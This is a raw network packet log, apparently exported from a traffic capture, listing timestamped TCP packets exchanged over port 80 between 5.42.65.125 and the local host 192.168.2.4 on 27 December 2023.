Dec 27, 2023 17:57:26.253379107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.253392935 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.253403902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.253415108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.253422022 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.253427029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.253439903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.253447056 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.253452063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.253462076 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.253464937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.253478050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.253501892 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.253551960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.253565073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.253576040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.253585100 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.253590107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.253608942 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.253653049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.253667116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.253679991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.253684044 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.253693104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.253705978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.253717899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.253727913 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.253731012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.253751993 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.253770113 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.254153967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.254168034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.254211903 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.254221916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.254281044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.254395008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.254409075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.254419088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.254427910 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.254431963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.254445076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.254452944 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.254456043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.254471064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.254471064 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.254483938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.254492998 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.254496098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.254508018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.254518986 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.254522085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.254535913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.254549026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.254555941 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.254561901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.254575968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.254576921 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.254589081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.254594088 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.254602909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.254615068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.254617929 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.254630089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.254642010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.254654884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.254657984 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.254676104 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.254705906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.255218029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.255251884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.255264044 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.255265951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.255276918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.255287886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.255295992 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.255301952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.255312920 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.255314112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.255338907 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.255392075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.255404949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.255417109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.255429029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.255440950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.255441904 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.255455017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.255465984 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.255470037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.255481958 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.255484104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.255496025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.255506039 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.255508900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.255522013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.255532980 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.255532980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.255546093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.255558968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.255563021 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.255572081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.255584002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.255592108 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.255597115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.255604982 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.255609989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.255626917 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.256905079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.256923914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.256936073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.256947994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.256958008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.256964922 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.256973028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.256987095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.256988049 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.256999016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.256999969 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.257013083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.257020950 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.257046938 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.257056952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.257071018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.257102966 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.257144928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.257249117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.257262945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.257273912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.257286072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.257296085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.257297993 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.257308960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.257319927 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.257324934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.257337093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.257339001 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.257355928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.257355928 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.257397890 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.257401943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.257415056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.257425070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.257436991 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.257446051 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.257472038 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.257565975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.257579088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.257591009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.257603884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.257606030 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.257617950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.257628918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.257636070 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.257642031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.257656097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.257662058 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.257668018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.257679939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.257690907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.257704020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.257711887 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.257715940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.257734060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.257745028 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.257747889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.257761955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.257769108 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.257798910 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.257812977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.257826090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.257837057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.257852077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.257864952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.257864952 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.257880926 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.257889032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.257901907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.257914066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.257925987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.257937908 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.257956982 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.258100986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.258115053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.258132935 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.258200884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.258219957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.258230925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.258243084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.258254051 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.258255005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.258270025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.258284092 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.258299112 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.258301973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.258315086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.258326054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.258342981 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.258363008 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.258411884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.258512974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.258529902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.258544922 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.258548975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.258558989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.258572102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.258584976 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.258588076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.258601904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.258605957 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.258615971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.258629084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.258642912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.258650064 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.258655071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.258666992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.258670092 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.258692026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.258694887 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.259030104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.259072065 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.259087086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.259130001 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.259176016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.259200096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.259285927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.259299994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.259310961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.259322882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.259325027 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.259336948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.259347916 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.259349108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.259361982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.259366989 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.259386063 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.259444952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.259458065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.259469032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.259481907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.259490013 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.259495974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.259507895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.259516954 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.259520054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.259535074 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.259553909 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.259558916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.259572029 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.259609938 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.259638071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.259651899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.259677887 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.259694099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.259706974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.259747028 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.259773970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.259975910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.260122061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.260158062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.260169983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.260178089 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.260183096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.260195971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.260207891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.260210037 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.260220051 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.260232925 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.260236979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.260250092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.260260105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.260263920 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.260272980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.260287046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.260293007 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.260299921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.260312080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.260323048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.260323048 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.260337114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.260344028 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.260354042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.260365963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.260376930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.260377884 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.260390997 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.260401011 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.260404110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.260417938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.260426044 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.260430098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.260442019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.260461092 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.260484934 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.260935068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.260951042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.260965109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.260998011 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.261111021 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.261125088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.261137962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.261151075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.261163950 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.261163950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.261178970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.261181116 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.261193037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.261205912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.261218071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.261225939 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.261233091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.261245966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.261251926 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.261260986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.261275053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.261285067 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.261288881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.261301994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.261312008 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.261316061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.261329889 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.261337996 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.261344910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.261358976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.261372089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.261385918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.261400938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.261410952 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.261410952 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.261426926 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.261866093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.261882067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.261893988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.261905909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.261919022 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.261949062 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.262006044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.262020111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.262032032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.262039900 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.262047052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.262059927 CET	80	49738	5.42.65.125	192.168.2.4
